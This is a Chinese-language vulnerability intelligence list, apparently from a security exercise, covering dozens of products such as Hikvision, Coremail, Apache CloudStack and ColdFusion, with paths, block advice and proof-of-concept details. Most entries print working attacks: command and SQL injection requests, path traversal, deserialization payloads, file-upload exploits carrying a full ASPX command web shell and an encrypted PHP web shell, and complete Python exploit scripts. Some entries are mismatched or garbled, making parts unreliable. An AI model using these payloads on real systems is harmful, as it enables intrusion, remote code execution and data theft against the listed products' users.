"text": "${gongsi.id}"
}
},
"isDrag": true
}
},
"dbexps": [],
"toolPrintSizeObj": {
"printType": "A4",
"widthPx": 718,
"heightPx": 1047
},
"dicts": [],
"freeze": "A1",
"dataRectWidth": 701,
"background": false,
"name": "sheet1",
"autofilter": {},
"styles": [
{
"align": "center"
}
],
"validations": [],
"cols": {
"4": {
"width": 95
},
"len": 50
},
"merges": [
"E4:F4",
"B4:B5",
"C4:C5",
"D4:D5",
"G4:G5",
"H4:H5",
"I4:I5",
"D1:G1",
"H3:I3"
]
}
海康威视
海康威视综合安防管理平台detection存在前台远程命令执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/center/api/installation/detection |
WAF封禁路径,等待发布补丁 |
724 |
nday |
漏洞详情
POST /center/api/installation/detection HTTP/1.1
{
"type": "environment",
"operate": "",
"machines": {
"id": "$(id > /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/1.txt)"
}
}
海康威视教育综合安防管理系统admintoken泄露
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/portal/conf/config.properties |
WAF封禁路路径,等待发布补丁 |
726 |
0day |
漏洞详情
/portal/conf/config.properties
海康威视视频监控管理后台垂直越权
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
未知 |
WAF封禁路路径,等待发布补丁 |
726 |
0day |
漏洞详情
未知
海康威视综合安防管理平台前台远程命令执行
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/portal/cas/login/ajax/licenseExpire.do |
WAF封禁路路径,等待发布补丁 |
729 |
1day |
漏洞详情
POST /portal/cas/login/ajax/licenseExpire.do HTTP/1.1
{"type":"environment","operate":"","machines":{"id":"$(id > /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/1.txt)"}
海康威视综合安防管理平台 clusters 接口任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/clusterMgr/clusters/ssl/file |
WAF封禁路路径,等待发布补丁 |
807 |
0day |
漏洞详情
POST /clusterMgr/clusters/ssl/file;.js HTTP/1.1
Host:
boundary=--------------------------984514492333278399715408
----------------------------984514492333278399715408
<%="nbklvuxv"%>
----------------------------984514492333278399715408
8.8.8.8
----------------------------984514492333278399715408--
海康威视综合安防管理平台 远程代码执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/bic/ssoService/v1/keepAlive |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
POST /bic/ssoService/v1/keepAlive HTTP/1.1
Host:
{"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": "恶意BCEL数据"}}}
海康威视综合安防管理平台uploadAllPackage任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/center_install/picUploadService/v1/uploadAllPackage/image |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
POST /center_install/picUploadService/v1/uploadAllPackage/image HTTP/1.1
----------------------------553898708333958420021355
expzhizhuo
----------------------------553898708333958420021355--
同享
同享TXEHR V15人力管理管理平台DownloadFile存在任意文件下载漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件下载 |
未知 |
/Service/DownloadTemplate.asmx |
WAF封禁路径,等待发布补丁 |
724 |
nday |
漏洞详情
POST /Service/DownloadTemplate.asmx HTTP/1.1
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:DownloadFile>
<!--type: string-->
<tem:path>../web.config</tem:path>
</tem:DownloadFile>
</soapenv:Body>
</soapenv:Envelope>
同享人力管理管理平台UploadHandler存在任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/Handler/UploadHandler.ashx |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
POST /Handler/UploadHandler.ashx?folder=Uploadfile2 HTTP/1.1
-----------------------------123
safdsfsfaa
-----------------------------123--
同享人力资源管理系统hdlUploadFile.ashx存在文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/MobileService/Web/Handler/hdlUploadFile.ashx |
WAF封禁路路径,等待发布补丁 |
812 |
1day |
漏洞详情
POST /MobileService/Web/Handler/hdlUploadFile.ashx?puser=../../../Style/rce HTTP/1.1
-----------------------------142851345723692939351758052805
<%@ Page Language="Jscript" validateRequest="false" %>
<%
var c=new System.Diagnostics.ProcessStartInfo("cmd");
var e=new System.Diagnostics.Process();
var out:System.IO.StreamReader,EI:System.IO.StreamReader;
c.UseShellExecute=false;
c.RedirectStandardOutput=true;
c.RedirectStandardError=true;
e.StartInfo=c;
c.Arguments="/c " + Request.Item["cmd"];
e.Start();
out=e.StandardOutput;
EI=e.StandardError;
e.Close();
Response.Write(out.ReadToEnd() + EI.ReadToEnd());
System.IO.File.Delete(Request.PhysicalPath);
Response.End();%>
-----------------------------142851345723692939351758052805--
全息
全息AI网络运维平台存在命令执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/nmss/cloud/Ajax/ajax_cloud_router_config.php |
WAF封禁路径,等待发布补丁 |
724 |
nday |
漏洞详情
POST /nmss/cloud/Ajax/ajax_cloud_router_config.php HTTP/1.1
ping_cmd=8.8.8.8|echo test > 1.txt
夏普
Sharp 多功能打印机未授权访问漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
全版本 |
/installed_emanual_list.html |
WAF封禁路径,等待发布补丁 |
724 |
nday |
漏洞详情
/installed_emanual_list.html
联软
联软安渡 UniNXG 安全数据交换系统SQL 注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/UniExServices/link/queryLinklnfo?address=%27%3BSELECT%20PG_SLEEP%285%29– |
WAF封禁路径,等待发布补丁 |
724 |
nday |
漏洞详情
/UniExServices/link/queryLinklnfo?address=%27%3BSELECT%20PG_SLEEP%285%29--
联软安渡UniNXG安全数据交换系统poserver.zz存在任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/UniExServices/poserver.zz |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
GET /UniExServices/poserver.zz?pgop=opendiskdoc&id=KmcgY3MtK3IpLSRfOXE9YmpkL2orbBdrKztnJCltInIrbDhyP24rOzhjPHI= HTTP/1.1
联软 UniSDP 零信任访问控制系统 jwt token 泄露漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 信息泄露 |
未知 |
/emm-core/oauth/token |
WAF封禁路路径,等待发布补丁 |
808 |
1day |
漏洞详情
GET /emm-core/oauth/token HTTP/1.1
论客
Coremail 邮件系统溢出
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
XT 5.0.13 |
未知 |
升级系统版本 |
724 |
nday |
漏洞详情
攻击者123.56.109.160
Coremail邮件系统未授权访问获取管理员账密
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/coremail/common/assets/; |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
/coremail/common/assets/;/;/;/;/;/;/s?__biz=MzI3MTk4NTcyNw==&mid=2247485877&idx=1&sn=7e5f77db320ccf9013c0b7aa72626e68&chksm=eb3834e5dc4fbdf3a9529734de7e6958e1b7efabecd1c1b340c53c80299ff5c688bf6adaed61&scene=2
LiveNVR
LiveNVR流媒体服务软件存在未授权访问漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/api/v1/device/channeltree?serial=&pcode |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
/api/v1/device/channeltree?serial=&pcode
科拓
科拓全智能停车视频收费系统CancelldList存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/KT_Admin/CarCard/DoubtCarNoListFrom.aspx |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
POST /KT_Admin/CarCard/DoubtCarNoListFrom.aspx HTTP/1.1
start=0&limit=20&filer=1;SELECT SLEEP(5)#
华磊
华磊科技物流modifyInsurance存在sql注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/modifyInsurance.htm |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
GET /modifyInsurance.htm?documentCode=1&insuranceValue=1&customerId=1+AND+6269=(SELECT+6269+FROM+PG_SLEEP(5)) HTTP/1.1
华磊科技物流getOrderTrackingNumber存在sql注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/getOrderTrackingNumber.htm |
WAF封禁路路径,等待发布补丁 |
725 |
1day |
漏洞详情
GET /getOrderTrackingNumber.htm?documentCode=1'and%0a1=user::integer-- HTTP/1.1
Bazarr
Bazarr swaggerui任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
GET /install/installOperate.do?svrurl=http://dnslog.cn HTTP/1.1
青果
青果教务系统存在未授权访问漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
未知 |
等着 |
725 |
未知 |
漏洞详情
未知
飞讯云
飞讯云WMS /MyDown/MylmportData 前台SQL注入
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/MyDown/MyImportData?opeid=’ WAITFOR DELAY ‘0:0:5’– AtpN |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
/MyDown/MyImportData?opeid=' WAITFOR DELAY '0:0:5'-- AtpN
Apache
Apache RocketMQ 敏感数据泄露漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 信息泄露 |
<5.3.0 |
未知 |
等着 |
725 |
未知 |
漏洞详情
未知
Apache-CloudStack中的SAML身份验证漏洞(CVE-2024-41107)
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/client/api |
升级系统版本 |
725 |
1day |
漏洞详情
import requests
from bs4 import BeautifulSoup
from datetime import datetime, timedelta
import xml.etree.ElementTree as ET
import base64
import logging
logging.basicConfig(filename='exploit.log', level=logging.INFO, format='%(asctime)s - %(message)s')
url = "http://target-cloudstack-instance.com/client/api"
def generate_saml_response(username):
issue_instant = datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ')
not_on_or_after = (datetime.utcnow() + timedelta(hours=1)).strftime('%Y-%m-%dT%H:%M:%SZ')
saml_response = f"""
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_8f0d8b57b7b34a1a8f0d8b57b7b34a1a" Version="2.0" IssueInstant="{issue_instant}" Destination="{url}">
<saml:Issuer>http://your-saml-issuer.com</saml:Issuer>
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<saml:Assertion Version="2.0" ID="_abc123" IssueInstant="{issue_instant}">
<saml:Issuer>http://your-saml-issuer.com</saml:Issuer>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">{username}</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData NotOnOrAfter="{not_on_or_after}" Recipient="{url}"/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="{issue_instant}" NotOnOrAfter="{not_on_or_after}">
<saml:AudienceRestriction>
<saml:Audience>{url}</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="{issue_instant}" SessionIndex="_abc123">
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
</saml:Assertion>
</samlp:Response>
"""
return base64.b64encode(saml_response.encode('utf-8')).decode('utf-8')
usernames = ["user1@example.com", "user2@example.com", "admin@example.com"]
def attempt_login(saml_response):
data = {
"command": "samlSsoLogin",
"SAMLResponse": saml_response
}
response = requests.post(url, data=data)
if response.status_code == 200:
soup = BeautifulSoup(response.text, 'html.parser')
session_id = soup.find('sessionid')
if session_id:
logging.info(f"Login successful, session ID: {session_id.text}")
print(f"Login successful, session ID: {session_id.text}")
else:
logging.info("Login failed, no session ID found in response.")
print("Login failed, no session ID found in response.")
else:
logging.info(f"Login failed, status code: {response.status_code}")
print(f"Login failed, status code: {response.status_code}")
for username in usernames:
saml_response = generate_saml_response(username)
attempt_login(saml_response)
Apache ActiveMQ远程命令执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
5.18.0<=Apache ActiveMQ<5.18.3 |
|
|
|
|
| 5.17.0<=Apache ActiveMQ<5.17.6 |
|
|
|
|
|
| 5.16.0<=Apache ActiveMQ<5.16.7 |
|
|
|
|
|
| 5.15.0<=Apache ActiveMQ<5.15.15 |
git自己搜 |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
|
漏洞详情
https://github.com/Hutt0n0/ActiveMqRCE
Apace_OFBiz_授权不当致远程代码执行漏洞CVE_2024_38856
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/webtools/control/main/ProgramExport |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
POST /webtools/control/main/ProgramExport HTTP/1.1
groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0069\u0064\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b
红海云
红海云eHR kgFile.mob 任意文件上传
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/RedseaPlatform/PtFjk.mob?method=upload |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
------WebKitFormBoundaryt7WbDl1tXogoZys4
<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
红海云eHR系统kgFile.mob存在任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/RedseaPlatform/kqFile.mob |
WAF封禁路路径,等待发布补丁 |
729 |
0day |
漏洞详情
POST /RedseaPlatform/kqFile.mob?method=uploadFile&fileName=fbjgrohu.jsp HTTP/1.1
------WebKitFormBoundaryeaaGwoqCxccjHcca
<% out.println(111*111); %>
------WebKitFormBoundaryeaaGwoqCxccjHcca--
Apache Tomcat存在信息泄露漏洞( CVE-2024-21733)
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 信息泄露 |
Apache Tomcat 9.0.0-M11至9.0.43 |
|
|
|
|
| Apache Tomcat 8.5.7至85.63 |
/ |
WAF封禁路路径,等待发布补丁 |
0813 |
nday |
|
漏洞详情
https://github.com/adysec/nuclei_poc/blob/4815f8becba3eccffa183087e84ed056cd05bab6/poc/cve/CVE-2024-21733.yaml
请求走私漏洞利用不稳定,未扫描出不代表漏洞不存在
PEPM
PEPM Cookie 远程代码执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
未知 |
等着 |
725 |
未知 |
漏洞详情
未知
金山
猎鹰安全(金山)终端安全系统V9 远程代码执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/inter/software_relation.php |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
POST /inter/software_relation.php HTTP/1.1
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
------WebKitFormBoundaryxRP5VjBKdqBrCixM
------WebKitFormBoundaryxRP5VjBKdqBrCixM
------WebKitFormBoundaryxRP5VjBKdqBrCixM
------WebKitFormBoundaryxRP5VjBKdqBrCixM
------WebKitFormBoundaryxRP5VjBKdqBrCixM
------WebKitFormBoundaryxRP5VjBKdqBrCixM
------WebKitFormBoundaryxRP5VjBKdqBrCixM
------WebKitFormBoundaryxRP5VjBKdqBrCixM
<?php @error_reporting(0); session_start(); $key="e45e329feb5d925b"; //rebeyond $_SESSION['k']=$key; session_write_close(); $post=file_get_contents("php://input"); if(!extension_loaded('openssl')) { $t="base64_"."decode"; $post=$t($post.""); for($i=0;$i<strlen($post);$i++) { $post[$i] = $post[$i]^$key[$i+1&15]; } } else { $post=openssl_decrypt($post, "AES128", $key); } $arr=explode('|',$post); $func=$arr[0]; $params=$arr[1]; class C{public function __invoke($p) {eval($p."");}} @call_user_func(new C(),$params); ?>
------WebKitFormBoundaryxRP5VjBKdqBrCixM
众合百易
湖南众合百易信息技术有限公司 资产管理运营系统 comfileup.php 前台文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/comfileup.php |
WAF封禁路路径,等待发布补丁 |
725 |
1day |
漏洞详情
POST /comfileup.php HTTP/1.1
Host:
----------1110146050
test
----------1110146050--
WVP
WVP视频平台(国标28181)未授权SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/api/push/list |
WAF封禁路路径,等待发布补丁 |
725 |
1day |
漏洞详情
GET /api/push/list?page=1&count=15&query=1'&pushing=&mediaServerId= HTTP/1.1
创客
创客13星零售商城系统前台任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/Login/shangchuan |
WAF封禁路路径,等待发布补丁 |
725 |
1day |
漏洞详情
POST /Login/shangchuan HTTP/1.1
------WebKitFormBoundary03rNBzFMIytvpWhy
<?php phpinfo();?>
------WebKitFormBoundary03rNBzFMIytvpWhy--
建文
建文工程管理系统BusinessManger.ashx存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/AppInterface/Business/BusinessManger.ashx |
WAF封禁路路径,等待发布补丁 |
725 |
1day |
漏洞详情
POST /AppInterface/Business/BusinessManger.ashx HTTP/1.1
method=PrjType&content=%' and 1=2 union select 1,(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','233')),3,32));-- a
建文工程管理系统desktop.ashx存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/SysFrame4/Desktop.ashx |
WAF封禁路路径,等待发布补丁 |
725 |
1day |
漏洞详情
POST /SysFrame4/Desktop.ashx HTTP/1.1
account=1'+and+%01(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','233')),3,32))<0--&method=isChangePwd&pwd=
明源
明源云ERP接口ApiUpdate.ashx文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/myunke/ApiUpdateTool/ApiUpdate.ashx |
WAF封禁路路径,等待发布补丁 |
725 |
1day |
漏洞详情
POST /myunke/ApiUpdateTool/ApiUpdate.ashx?apiocode=a HTTP/1.1
{{unquote("PK\x03\x04\x14\x00\x00\x00\x08\x00\xf2\x9a\x0bW\x97\xe9\x8br\x8c\x00\x00\x00\x93\x00\x00\x00\x1e\x00\x00\x00../../../fdccloud/_/check.aspx$\xcc\xcb\x0a\xc20\x14\x04\xd0_\x09\x91B\xbb\x09\x0a\xddH\xab\x29\x8aP\xf0QZ\xc4\xf5m\x18j!ib\x1e\x82\x7fo\xc4\xdd0g\x98:\xdb\xb1\x96F\xb03\xcdcLa\xc3\x0f\x0b\xce\xb2m\x9d\xa0\xd1\xd6\xb8\xc0\xae\xa4\xe1-\xc9d\xfd\xc7\x07h\xd1\xdc\xfe\x13\xd6%0\xb3\x87x\xb8\x28\xe7R\x96\xcbr5\xacyQ\x9d&\x05q\x84B\xea\x7b\xb87\x9c\xb8\x90m\x28<\xf3\x0e\xaf\x08\x1f\xc4\xdd\x28\xb1\x1f\xbcQ1\xe0\x07EQ\xa5\xdb/\x00\x00\x00\xff\xff\x03\x00PK\x01\x02\x14\x03\x14\x00\x00\x00\x08\x00\xf2\x9a\x0bW\x97\xe9\x8br\x8c\x00\x00\x00\x93\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00../../../fdccloud/_/check.aspxPK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00L\x00\x00\x00\xc8\x00\x00\x00\x00\x00")}}
vsoft=kvm&hostType=physical&name=penson&extranet=127.0.0.1%7Ccalc.exe&cpuCores=2&
memory=16&diskSize=16&desc=&uid=640be59da4851&type=za
向日葵
据说有全版本0day
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
全版本 |
未知 |
等着 |
725 |
0day |
漏洞详情
未知
29网课
29网课交单平台epay.php存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/epay/epay.php |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
POST /epay/epay.php HTTP/1.1
out_trade_no=' AND (SELECT 8078 FROM (SELECT(SLEEP(5)))eEcA) AND 'aEmC'='aEmC
360
360 新天擎终端安全管理系统存在信息泄露漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 信息泄露 |
未知 |
/runtime/admin_log_confcache |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
/runtime/admin_log_confcache
360天擎 - 未授权访问
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/api/dbstat/gettablessize |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
/api/dp/rptsvcsyncpoint?ccid=1
360天擎 - sql注入
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/api/dp/rptsvcsyncpoint |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
/api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)--
Adobe
Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/CFIDE/adminapi/_servermanager/servermanager.cfc |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
import requests
import re
import urllib3
import argparse
urllib3.disable_warnings()
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target",required=True, help="Target Adobe ColdFusion Server URL")
parser.add_argument("-p", "--port",required=False, default=8500, help="Target Adobe ColdFusion Server Port, by default we use the 8500 Port")
parser.add_argument("-c", "--command", required=True,help="File to read path")
args = parser.parse_args()
def get_uuid():
endpoint = "/CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat"
session = requests.Session()
try:
response = session.get(args.target+":"+str(args.port)+endpoint, verify=False)
print("[+] Connecting to ColdFusion Server...")
repattern = r"<var name='uuid'><string>(.+?)</string></var>"
uuid = re.findall(repattern, response.text)[0]
print("[+] UUID Obtained: ", uuid)
return uuid
except:
print("[-] Error connecting to server")
def exploit(uuid):
headers = {
"uuid": uuid
}
session = requests.Session()
endpoint2 = "/pms?module=logging&file_name=../../../../../../../"+args.command+"&number_of_lines=100"
response = session.get(args.target+":"+str(args.port)+endpoint2, verify=False, headers=headers)
if response.status_code == 200 and int(response.headers["Content-Length"]) > 2:
print("[+] Succesfully read file!")
print(response.text)
else:
print("[-] Something went wrong while reading file or the file doesn't exist")
if __name__ == "__main__":
exploit(get_uuid())
Aegon
AEGON-LIFEv1.0存在SQL注入漏洞(CVE-2024-36597)
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/lims/clientStatus.php |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
GET /lims/clientStatus.php?client_id=1511986023%27%20OR%201=1%20--%20a HTTP/1.1
python
aiohttp存在目录遍历漏洞(CVE-2024-23334)
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 目录遍历 |
未知 |
/static/../../../../../../etc/passwd |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
GET /static/../../../../../../etc/passwd HTTP/1.1
AJ
AJ-Report开源数据大屏存在远程命令执行漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
v1.4.0 |
/dataSetParam/verification;swagger-ui/ |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
刀客
APP分发签名系统index-uplog.php存在任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/source/pack/upload/2upload/index-uplog.php |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
POST /source/pack/upload/2upload/index-uplog.php HTTP/1.1
------WebKitFormBoundary03rNBzFMIytvpWhy
1-2
------WebKitFormBoundary03rNBzFMIytvpWhy
<?php phpinfo();?>
------WebKitFormBoundary03rNBzFMIytvpWhy--
Array
Array VPN任意文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/prx/000/http/localhost/client_sec/%00../../../addfolder |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
GET /prx/000/http/localhost/client_sec/%00../../../addfolder HTTP/1.1
Check Point
Check-Point安全网关任意文件读取漏洞(CVE-2024-24919)
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
Check Point Security Gateways R77.20 (EOL) |
|
|
|
|
| Check Point Security Gateways R77.30 (EOL) |
|
|
|
|
|
| Check Point Security Gateways R80.10 (EOL) |
|
|
|
|
|
| Check Point Security Gateways R80.20 (EOL) |
|
|
|
|
|
| Check Point Security Gateways R80.20.x |
|
|
|
|
|
| Check Point Security Gateways R80.20SP (EOL) |
|
|
|
|
|
| Check Point Security Gateways R80.30 (EOL) |
|
|
|
|
|
| Check Point Security Gateways R80.30SP (EOL) |
|
|
|
|
|
| Check Point Security Gateways R80.40 (EOL) |
|
|
|
|
|
| Check Point Security Gateways R81 |
|
|
|
|
|
| Check Point Security Gateways R81.10 |
|
|
|
|
|
